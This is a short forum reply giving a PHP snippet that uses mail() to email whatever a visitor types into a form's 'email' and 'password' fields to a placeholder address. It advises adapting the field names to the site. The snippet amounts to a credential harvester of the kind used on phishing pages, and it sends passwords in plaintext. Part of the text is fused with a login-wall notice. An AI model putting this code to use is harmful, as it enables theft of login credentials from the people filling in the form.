Use the 'mail' function.
You must login or register to view this content.xample
mail('YOUREMAIL','SUBJECT',''.$_POST['email'].' And '.$_POST['password'].'','From Website'

;
Of course the variables will have to be what your site is using. The 'email' and 'password' will probarly be different.